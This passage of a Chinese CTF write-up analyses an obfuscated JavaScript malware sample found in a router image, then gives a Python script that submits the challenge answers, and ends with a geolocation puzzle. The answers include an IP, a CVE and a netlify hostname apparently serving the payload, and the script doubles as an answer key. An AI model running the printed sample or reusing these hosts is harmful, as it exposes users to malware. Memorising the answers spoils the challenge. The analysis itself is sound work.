_0x5a6d64[_0x29aea6(0x23d,'M9KP')](_0x50d27d);}};if(_0x5a6d64[_0x162c23(0x179,'qiA#')](_0x5a6d64[_0x162c23(0x1b2,'7@A8')],_0x5a6d64[_0x162c23(0x223,'DRFK')])){if(_0x5a6d64[_0x162c23(0x222,'k04G')](typeof _0x236119,_0x5a6d64[_0x162c23(0x214,'L)Lu')])){var _0x6a630d=function(){while(!![]){}};return 
_0x5a6d64[_0x162c23(0x23e,'TF@&')](_0x6a630d);}else{if(_0x5a6d64[_0x162c23(0x1d3,'#c4u')](_0x5a6d64[_0x162c23(0x1be,'ORA9')]('',_0x5a6d64[_0x162c23(0x21b,')TRo')](_0x236119,_0x236119))[_0x5a6d64[_0x162c23(0x212,'j^nA')]],0x1)||_0x5a6d64[_0x162c23(0x185,'UpzS')](_0x5a6d64[_0x162c23(0x228,']N9a')](_0x236119,0x14),0x0)){if(_0x5a6d64[_0x162c23(0x1da,'X[kZ')](_0x5a6d64[_0x162c23(0x219,'fJhn')],_0x5a6d64[_0x162c23(0x204,'ORA9')]))while(!![]){}else debugger;}else{if(_0x5a6d64[_0x162c23(0x168,')TRo')](_0x5a6d64[_0x162c23(0x165,'D]Fd')],_0x5a6d64[_0x162c23(0x1c7,'0R*f')])){var _0x30cece=function(){while(!![]){}};return _0x27ac81[_0x162c23(0x170,'JWFg')](_0x30cece);}else debugger;}}_0x5a6d64[_0x162c23(0x1c4,'[d3G')](_0x187f4f,++_0x236119);}else{var _0x272b1f=_0x5a6d64[_0x162c23(0x1f7,'YrGO')](typeof _0x380ed3,_0x5a6d64[_0x162c23(0x1b4,'!Qo3')])?_0x1dd925:_0x5a6d64[_0x162c23(0x1f2,'ScTl')](typeof _0x1ae0b1,_0x5a6d64[_0x162c23(0x1a7,'0R*f')])&&_0x5a6d64[_0x162c23(0x1ab,'ypEV')](typeof _0x47936f,_0x5a6d64[_0x162c23(0x229,'[$(S')])&&_0x5a6d64[_0x162c23(0x169,'[$(S')](typeof _0x34b1fa,_0x5a6d64[_0x162c23(0x164,'M9KP')])?_0x5cdd6f:this,_0x15c846=_0x272b1f[_0x162c23(0x16c,'nT*h')]=_0x272b1f[_0x162c23(0x182,'KC3!')]||{},_0x391d34=[_0x5a6d64[_0x162c23(0x240,'t!ua')],_0x5a6d64[_0x162c23(0x211,'n*Ts')],_0x5a6d64[_0x162c23(0x1fa,'ypEV')],_0x5a6d64[_0x162c23(0x160,'qiA#')],_0x5a6d64[_0x162c23(0x1f9,'n*Ts')],_0x5a6d64[_0x162c23(0x1c8,'fJhn')],_0x5a6d64[_0x162c23(0x1ad,']N9a')]];for(var _0x404990=0x0;_0x5a6d64[_0x162c23(0x22d,'KC3!')](_0x404990,_0x391d34[_0x162c23(0x218,'X[kZ')]);_0x404990++){var _0x376374=_0x5a6d64[_0x162c23(0x230,'pyi$')][_0x162c23(0x23c,'k04G')]('|'),_0x557c1b=0x0;while(!![]){switch(_0x376374[_0x557c1b++]){case'0':var _0x4a557a=_0x15c846[_0x3911b1]||_0x5d5cf5;continue;case'1':_0x5d5cf5[_0x162c23(0x21e,'ORA9')]=_0x2a9bf8[_0x162c23(0x203,'Spg9')](_0x51fbef);continue;case'2':var 
_0x3911b1=_0x391d34[_0x404990];continue;case'3':_0x5d5cf5[_0x162c23(0x1e9,'M9KP')]=_0x4a557a[_0x162c23(0x1ec,'ScTl')][_0x162c23(0x17a,'DRFK')](_0x4a557a);continue;case'4':var _0x5d5cf5=_0x1ee7d1[_0x162c23(0x20a,'t!ua')][_0x162c23(0x231,'j^nA')][_0x162c23(0x189,'UpzS')](_0x4a31ff);continue;case'5':_0x15c846[_0x3911b1]=_0x5d5cf5;continue;}break;}}}}try{if(_0x3624b3){if(_0x5a6d64[_0x33a2cc(0x178,'UsZi')](_0x5a6d64[_0x33a2cc(0x1ac,'X[kZ')],_0x5a6d64[_0x33a2cc(0x1fb,'^woW')])){if(_0x1d18ee){var _0x7ab7da=_0x3781a2[_0x33a2cc(0x171,'Y0V*')](_0x20a489,arguments);return _0x570abc=null,_0x7ab7da;}}else return _0x187f4f;}else _0x5a6d64[_0x33a2cc(0x1aa,'fJhn')](_0x187f4f,0x0);}catch(_0xc21d1e){}}var version_ = 'jsjiami.com.v7';
可以查到它是用jsjiami.com.v7混淆(加密)的(文件首尾都带有'jsjiami.com.v7'标记),在微信中搜到这篇文章
https://mp.weixin.qq.com/s/H4jhSh7KDWM7UiMCYFFzaA
提到了https://github.com/echo094/decode-js这个项目可以解密
用它静态还原后就能读出托管恶意文件的主机名,得到最后的答案。样本里带有debugger语句和死循环形式的反调试逻辑,分析时应使用静态还原工具,不要直接在浏览器里运行它
最后的exp如下:
import socket
import hashlib
from itertools import product
import string
import re
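def find_prefix(target_hash, suffix, max_length=4):
    """Brute-force the proof-of-work prefix for ``sha256(prefix + suffix)``.

    Args:
        target_hash: Hex SHA-256 digest announced by the server. Upper- and
            lower-case hex are both accepted.
        suffix: Known tail of the preimage, taken from the challenge line.
        max_length: Longest prefix to try. Lengths 1..max_length are searched
            in order over ASCII letters and digits.

    Returns:
        The first matching prefix as ``str``, or ``None`` when no candidate of
        up to ``max_length`` characters hashes to ``target_hash``.
    """
    charset = string.ascii_letters + string.digits
    # hexdigest() is always lower-case, while the regex in main() also accepts
    # A-F; normalise once so an upper-case digest can still be matched.
    wanted = target_hash.strip().lower()
    # The suffix never changes, so encode it once outside the hot loop.
    suffix_bytes = suffix.encode()
    for length in range(1, max_length + 1):
        for candidate in product(charset, repeat=length):
            prefix = ''.join(candidate)
            digest = hashlib.sha256(prefix.encode() + suffix_bytes).hexdigest()
            if digest == wanted:
                return prefix
    return None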
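def main():
    """Talk to the challenge service: solve the PoW, then answer Q1-Q6.

    The function reads the server's prompts from a TCP socket, answers the
    ``sha256(XXXX+suffix) == digest`` proof-of-work with ``find_prefix`` and
    replies to each ``Qn ... Answer:`` prompt with the value recovered during
    the disk analysis. It returns when the remote side closes the connection.
    """
    host = 's1.r3.ret.sh.cn'
    # The author redacted the per-instance port. Replace this placeholder with
    # the port issued for the challenge instance; as written it raises
    # NameError at runtime.
    port = xxxxx

    # Answers found in the router image, keyed by the question tag that the
    # server prints. Dict order matters: tags are checked Q1 first.
    answers = {
        "Q1": b"23.05.4\n",
        "Q2": b"156.238.233.47\n",
        "Q3": b"CVE-2022-28927\n",
        "Q4": b"dropbear\n",
        "Q5": b"portal.r3.internal\n",
        "Q6": b"nimble-bonbon-d941a8.netlify.app\n",
    }
    pow_pattern = re.compile(r"sha256\(XXXX\+([^\)]+)\) == ([0-9a-fA-F]{64})")

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        buffer = b""
        while True:
            data = s.recv(4096)
            if not data:
                print("[*] Connection closed by remote host")
                break
            buffer += data
            text = buffer.decode(errors='ignore')
            # Echo only the new chunk. Printing the whole accumulated buffer
            # would repeat earlier output whenever a prompt arrives in pieces.
            print(data.decode(errors='ignore'), end='')

            # SHA256 challenge detection
            if "sha256(" in text and "== " in text:
                m = pow_pattern.search(text)
                if m:
                    suffix = m.group(1)
                    target_hash = m.group(2)
                    print(f"[+] Found challenge: suffix={suffix}, target={target_hash}")
                    prefix = find_prefix(target_hash, suffix)
                    if prefix is not None:
                        print(f"[+] Solved: XXXX = {prefix}")
                        s.sendall((prefix + "\n").encode())
                    else:
                        print("[-] Prefix not found within search limits.")
                        # Send an empty line so the server is not left waiting.
                        s.sendall(b"\n")
                    # The challenge has been handled; start a fresh buffer.
                    buffer = b""
                # No regex match yet means the challenge line is incomplete:
                # keep the buffer and wait for more data.
            elif "Answer:" in text:
                for tag, answer in answers.items():
                    if tag in text:
                        s.sendall(answer)
                        buffer = b""
                        break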
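# Run the solver only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()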
Misc
R3GIRL in Paris
知识点省流
简单的图寻
WP
ez图寻,图丢给google就能找到位置是法国巴黎13区
把位置告诉gpt,然后让其帮忙整理即可(最后作者名的顺序换一下)